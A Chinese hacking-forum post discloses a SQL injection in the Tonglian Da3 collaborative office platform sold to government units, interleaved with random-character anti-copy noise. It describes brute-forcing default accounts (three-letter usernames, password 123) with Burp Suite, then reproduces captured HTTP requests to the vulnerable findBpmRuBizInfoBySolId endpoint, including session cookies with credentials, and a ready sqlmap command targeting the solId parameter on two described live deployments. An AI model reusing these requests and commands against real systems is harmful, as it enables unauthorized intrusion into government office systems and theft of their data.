找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1351|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

7 f" a6 E: K7 \' n/ p" Z5 z2 q
- V* j5 N" w. D5 j$ V9 A- u

3 }1 `! Z! @0 _* u5 g! [( Y

1 W) A h) k- S5 R9 v" x 平台简介: 5 p; t, c6 J/ }" k6 V5 h

5 k$ M r# C# h& ^+ j, I

2 u: W) o" T `8 p/ x( I  ! d6 P% q) h# q6 j+ r" E" s1 }2 ^6 r

# N! e1 E* G; Q1 z( ~( x

% I* @% Z+ n* ~+ P: s" b 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
: A& g4 g s+ F$ j) q" c同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
/ P1 y9 g }! G- s+ s, Z" p 同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献! ( Q: s1 t- j) \$ b

( N" K; g; D: w- J

" i2 F! X! @ V1 I p$ y7 _  & @) B: o; U- f- B

, a9 V, n z- C" S: J/ n0 g

* `0 F) T1 Q$ w% b2 c/ L2 i3 S' g 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址: + n8 T w ~( H3 W) g

" A- z- S$ |+ _& n! u7 K

q' K ~, m) ?4 w" n   8 e% R' r4 S9 Z! P% S5 B

3 F/ x* q, z) y1 v# p8 u- d9 i

6 k6 Q5 m: s3 N http://1.1.1.1:7197/cap-aco/#(案例2-)1 a7 K# G- S/ m: j) Y+ I" u

w7 c U+ P7 g* n; k. ? A. v% J

* v2 ~* X" S3 ^2 q/ M http://www.XXOO.com (案例1-官网网站) 6 t/ }& m6 T: W' z' T3 @1 \" H

% A% r$ t( R. D# G

2 r2 ?$ R; o0 w. x6 s1 K3 B: Q   + P8 m p8 l6 g3 \4 k

+ J3 @" x, k( k2 [/ F- C' W3 P

4 S; ]# m: z8 X- T. e/ m 漏洞详情:4 g4 Q6 c, x* _( b ]* V

9 r( f; |# @( l8 j$ [) p3 P4 G

( Y2 R r* ?$ z4 z/ v- k' v  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 # W9 V3 l, a" a

( B& y9 Q# R# ^2 [; J2 a" B1 q7 w

! b% ]3 u" J+ ^9 `1 K. r9 S      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:2 ^& P9 u1 B- y- z0 C7 W1 F

8 s# G1 E9 K4 Q8 D# u/ v' g

, o" @- w. X5 ?- g5 }0 ~$ ^9 Q+ G   $ l6 H1 B0 x0 }& G+ e' y: r

0 _9 U) P4 a1 ~6 K2 v/ ^, L8 \9 N

3 x/ n( S6 R) r& y) L   M( J9 ?1 w, s _# m; P! T; v- v- G

! O4 H# |* D0 v( S

6 j0 a1 _8 x- { status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下: , J! N4 {! J5 i' {. X

0 H; [9 c. R% f3 z R

& r$ T3 O9 r; s* ?% |: t' [ 1、案例1-官方网站 2 C9 F* R9 \/ U9 [/ s" ~& H: Z. ^

) ~# [0 m* |2 g/ f

2 H$ p9 L- c9 _- V+ Y% m GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1% x/ _' ~( i6 V

4 [0 Z; {9 F1 b/ Q7 D

) |7 w/ u: N% m; Q8 T3 h" z% @' j Host: www.XXOO.com 9 |4 l4 M, U$ H! r% q

7 L3 R) c% d( d# W

: p* G' u# q$ u" H! z Proxy-Connection: Keep-Alive 5 `" h. p2 Z5 D8 y# c8 j

* t2 U8 @/ [ r- x3 w& c! O6 I" j

4 O: j* v0 @$ M2 J C+ v% ]3 } Accept: application/json, text/javascript, */*; q=0.01! ~7 y0 y: I+ [4 Y0 O* g

* ]+ P/ o+ H% G1 p

4 W* I+ M3 E0 w6 t/ e Accept-Language: zh-CN 3 f E4 Z: X8 P3 \9 y c. A% V# V

/ q. ^/ S, w( Z- G' j! n

- C- C* P! N3 A) l Content-Type: application/json3 }; Y' D8 b/ q/ X$ S' j3 r

! p4 J1 a# B5 n9 t( R' z( F

% \2 g/ @ z6 r/ `, v User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko ( d2 i7 M7 l/ b* d1 d

8 u; v# J4 h& N2 Z/ I" L3 l' H

( _1 W- G# Z) \+ V1 ~" [: V% X X-Requested-With: XMLHttpRequest8 }5 w3 T& {! a* [2 R

' k* [ P% ?+ }( i) l$ y/ k7 A- S

5 p5 l s4 l! p/ l Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002 * z0 |: S/ C. P- E6 C/ W' S' l

0 A& `6 H- w, {5 d, q% W

! b/ A: F* V# G Accept-Encoding: gzip, deflate, sdch, ?. Z$ w0 X( \& x, ? z' n

; Z" a: w' H0 |( H9 q6 f r

" A1 L( W' C& u& z, C8 @, y$ l& g3 S& B Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e + j: ~0 M' T/ g- i0 W4 ~" }

8 A3 u; R! `, W: c' p

, z5 O* m. ]# G+ U 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: 7 S! R8 X. Z/ A4 k0 `: _9 ]) k$ T/ s

) \& W6 J% v$ C- [ A$ ~ o& v

6 p. O* q- x3 \! y$ ^/ Z  7 I; S) u) r1 `! x

1 D3 S+ p x. l0 ~; u

1 c1 _9 M5 w: a' K   % L$ \7 Z" V" F$ G

- I3 x" @# a/ \! p3 U1 u

* R5 a" J. [6 O+ F% r   , C/ I$ f, E$ n F: U0 m

! J6 M: Z7 I# w0 i

* g* L( D h6 v- n" b' a& `  * {! y) u2 _4 W( K, h- O

4 w) d8 J1 {0 P% o k- H5 s8 n/ m

8 G1 m3 u I. W+ B5 X# { [   B& N5 H7 f; l/ f

9 E' o" i* c# C, ?- h- a

' s g7 F' V, g 2、案例2-某天河云平台 ; W9 B8 a7 `" q+ b- O

e8 P- y- g6 u" N6 P# Z

" s: @5 ?3 _( {/ ] C- } GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1 $ |" ^ n# g( q I

8 B1 [: W: Y8 I9 O C% R" M* y

: K3 K0 R( E: `0 Z M" u6 ~ Host: 1.1.1.:7197 8 s0 Z5 h H: K; E T9 L

9 D7 q3 R) G" f% ?

: k0 x% }! c; r. t& q# R( j Accept: application/json, text/javascript, */*; q=0.01! F$ M7 `# o8 x/ Z* m

4 |- R0 {7 E+ c3 f1 B9 t+ E7 O

0 v5 k, ]7 Q3 C6 A0 D* X X-Requested-With: XMLHttpRequest " I% L7 `( o0 _/ a

/ F$ e: w1 o7 w I: C. }

a$ ^5 p" D* G User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 5 j R# d7 n! h+ I8 b0 Z( X

1 |* I# N% s: c2 h+ L4 r) y

* `% x# U0 Z5 _6 i$ {$ s/ N. P4 ` Content-Type: application/json ) y+ T7 ^- r! U; @6 j# d

( O0 c2 Y( j5 C$ W# R

1 w. O1 ^( z. Q# h4 `, \ Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 ' N2 P! M& a; k" W4 C% I0 @& M

8 u# Y( W5 P& q

7 V# X% m" U! v. A9 d4 s Accept-Language: zh-CN,zh;q=0.8+ h3 c8 U& |1 c2 q0 m+ B( N+ f1 j. M

5 R/ O6 w" s" A c' w

0 L5 B1 G# q9 `9 ^+ g# n Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 ; e, q- W8 A- r- r2 r! C# e

: a5 L6 q e/ t5 n" v* z5 |) G

' Z' f' x4 j/ o# g) z) i Connection: close / x8 s; }7 ?; k q) d; F: q

' x' e; P: x8 D* k3 g

( C" w2 C# F. I+ Q8 {4 c" I 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:$ [: A- G0 A# U1 A+ ]1 C

/ P9 G% n& d% I3 y; U3 C: s$ @; N

% M. f+ @' i9 R0 ^8 N. X: ~   ' x6 J. H+ j9 _ q+ {

0 k1 N! b3 |; W9 w* m

# ? v |0 T$ l0 D/ _
# ]* k9 b8 ^ W, N) A% c2 u: w, Q

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表